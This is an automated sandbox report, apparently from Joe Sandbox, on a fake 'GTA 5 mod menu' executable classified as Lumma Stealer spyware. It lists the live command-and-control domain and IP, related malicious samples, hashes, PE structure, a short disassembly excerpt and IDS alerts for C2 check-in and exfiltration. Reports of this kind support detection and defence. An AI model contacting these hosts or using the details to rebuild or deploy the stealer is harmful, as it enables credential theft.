                https://fancywaxxers.shop/api100%Avira URL Cloudmalware
                https://fancywaxxers.shop/100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apizv100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/api_seed_date100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/api100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                fancywaxxers.shop
                104.21.96.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://fancywaxxers.shop/apitrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://fancywaxxers.shop/apieGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://fancywaxxers.shop/apiH$0?GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsp.rootca1.amazontrust.com0:GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.ecosia.org/newtab/GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://ac.ecosia.org/autocomplete?q=GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://fancywaxxers.shop/api9v&?GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.c.lencr.org/0GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.i.lencr.org/0GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://fancywaxxers.shop:443/api_seed_dateGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2146796814.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147024672.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://fancywaxxers.shop/GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2160705276.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136057544.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2160514504.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2137052378.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2196493094.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2191993224.0000000003597000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2108339651.0000000003549000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136299155.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://support.mozilla.org/products/firefoxgro.allGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.mozilla.orGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148144892.0000000005CC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://fancywaxxers.shop:443/apiGTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://fancywaxxers.shop/apizvGTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338561708.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202624391.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830428069.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.96.1
                                                                  fancywaxxers.shopUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1582531
                                                                  Start date and time:2024-12-30 20:40:08 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 4m 49s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:9
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:GTA-5-Mod-Menu-2025.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@6/0@1/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 97%
                                                                  • Number of executed functions: 47
                                                                  • Number of non-executed functions: 125
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target GTA-5-Mod-Menu-2025.exe, PID 64 because there are no executed function
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: GTA-5-Mod-Menu-2025.exe
                                                                  TimeTypeDescription
                                                                  14:40:58API Interceptor8x Sleep call for process: GTA-5-Mod-Menu-2025.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                  • pelisplus.so/administrator/index.php
                                                                  Recibos.exeGet hashmaliciousFormBookBrowse
                                                                  • www.mffnow.info/1a34/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  fancywaxxers.shoprandom.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.48.1
                                                                  UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.32.1
                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.80.1
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSAquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.16.1
                                                                  web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                  • 172.67.154.95
                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.208.58
                                                                  SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                  • 104.21.64.143
                                                                  Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                  • 188.114.97.3
                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                  • 188.114.96.3
                                                                  #Setup.exeGet hashmaliciousLummaCBrowse
                                                                  • 188.114.97.3
                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                  • 104.21.0.151
                                                                  https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                  • 104.17.25.14
                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.64.143
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  a0e9f5d64349fb13191bc781f81f42e1AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                  • 104.21.96.1
                                                                  web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                  • 104.21.96.1
                                                                  Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  #Setup.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.96.1
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.822135248890638
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:GTA-5-Mod-Menu-2025.exe
                                                                  File size:820'736 bytes
                                                                  MD5:97098e0b103acdf642b87d2b96155992
                                                                  SHA1:e6ffd40917dcb773e6cd7a9dba339cf967498c8a
                                                                  SHA256:cec32b81cc4dfb722928389bea59758bfe275da7b36732512d887a845053e191
                                                                  SHA512:87cb9a9394ef39a3728933ba21a81089f1982c5f7a563104bbb64c984b57bbc0d0945fe514f71b2f37df526606d22ea6566be9ab8e18d1e25234052f05d68744
                                                                  SSDEEP:12288:ou4dP5M4Q2MmbFsgMH+GsGde1vy0xt4K7wam97DFsgMH+GsGde1vy0xt4K7wam9x:t4dPpQPmPMH4Koqq697nMH4Koqq697N
                                                                  TLSH:E4050252B650C0B2C9B3117255F5DBB6493EBA214F317ECF67980FAE4E311E15A30B2A
                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....rg.................H........................@.......................................@.....................................(..
                                                                  Icon Hash:00928e8e8686b000
                                                                  Entrypoint:0x40a2a0
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows cui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6772AADA [Mon Dec 30 14:14:50 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:d6bfc0ff235c28cc21f6045af30834e6
                                                                  Instruction
                                                                  call 00007FF42967A32Ah
                                                                  jmp 00007FF42967A18Dh
                                                                  mov ecx, dword ptr [004307C0h]
                                                                  push esi
                                                                  push edi
                                                                  mov edi, BB40E64Eh
                                                                  mov esi, FFFF0000h
                                                                  cmp ecx, edi
                                                                  je 00007FF42967A326h
                                                                  test esi, ecx
                                                                  jne 00007FF42967A348h
                                                                  call 00007FF42967A351h
                                                                  mov ecx, eax
                                                                  cmp ecx, edi
                                                                  jne 00007FF42967A329h
                                                                  mov ecx, BB40E64Fh
                                                                  jmp 00007FF42967A330h
                                                                  test esi, ecx
                                                                  jne 00007FF42967A32Ch
                                                                  or eax, 00004711h
                                                                  shl eax, 10h
                                                                  or ecx, eax
                                                                  mov dword ptr [004307C0h], ecx
                                                                  not ecx
                                                                  pop edi
                                                                  mov dword ptr [00430800h], ecx
                                                                  pop esi
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  sub esp, 14h
                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                  xorps xmm0, xmm0
                                                                  push eax
                                                                  movlpd qword ptr [ebp-0Ch], xmm0
                                                                  call dword ptr [0042E8C8h]
                                                                  mov eax, dword ptr [ebp-08h]
                                                                  xor eax, dword ptr [ebp-0Ch]
                                                                  mov dword ptr [ebp-04h], eax
                                                                  call dword ptr [0042E884h]
                                                                  xor dword ptr [ebp-04h], eax
                                                                  call dword ptr [0042E880h]
                                                                  xor dword ptr [ebp-04h], eax
                                                                  lea eax, dword ptr [ebp-14h]
                                                                  push eax
                                                                  call dword ptr [0042E910h]
                                                                  mov eax, dword ptr [ebp-10h]
                                                                  lea ecx, dword ptr [ebp-04h]
                                                                  xor eax, dword ptr [ebp-14h]
                                                                  xor eax, dword ptr [ebp-04h]
                                                                  xor eax, ecx
                                                                  leave
                                                                  ret
                                                                  mov eax, 00004000h
                                                                  ret
                                                                  push 00431AB8h
                                                                  call dword ptr [0042E8E8h]
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  mov al, 01h
                                                                  ret
                                                                  push 00030000h
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6ac0x28.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1b80.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2e8200x14c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x2479a0x24800e99bb4e274380b09613559d3b1a664fbFalse0.554781142979452data6.559742159760055IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x260000x9eb40xa0003f1d7f6413abea491661acb746eefebfFalse0.428271484375DOS executable (COM)4.91372050063646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x300000x22800x1600112d0c9e43893ae5b7f96d23807996acFalse0.39506392045454547data4.581141173428789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x350000x1b800x1c006e4c901089600f702531dbe2643a65b6False0.7770647321428571data6.526735403310053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  .BSS0x370000x4b0000x4b000935c377743f9d6031645984e06824d03False1.0003287760416666data7.999502416028787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .BSS0x820000x4b0000x4b000935c377743f9d6031645984e06824d03False1.0003287760416666data7.999502416028787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                  DLLImport
                                                                  KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-30T20:40:58.501835+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649705104.21.96.1443TCP
                                                                  2024-12-30T20:40:58.976794+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649705104.21.96.1443TCP
                                                                  2024-12-30T20:40:58.976794+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649705104.21.96.1443TCP
                                                                  2024-12-30T20:40:59.471486+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649706104.21.96.1443TCP
                                                                  2024-12-30T20:41:00.222152+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649706104.21.96.1443TCP
                                                                  2024-12-30T20:41:00.222152+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649706104.21.96.1443TCP
                                                                  2024-12-30T20:41:01.036591+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707104.21.96.1443TCP
                                                                  2024-12-30T20:41:02.335243+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649708104.21.96.1443TCP
                                                                  2024-12-30T20:41:03.475678+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709104.21.96.1443TCP
                                                                  2024-12-30T20:41:05.142811+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710104.21.96.1443TCP
                                                                  2024-12-30T20:41:07.345131+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649710104.21.96.1443TCP
                                                                  2024-12-30T20:41:08.394830+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712104.21.96.1443TCP
                                                                  2024-12-30T20:41:10.624047+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649728104.21.96.1443TCP
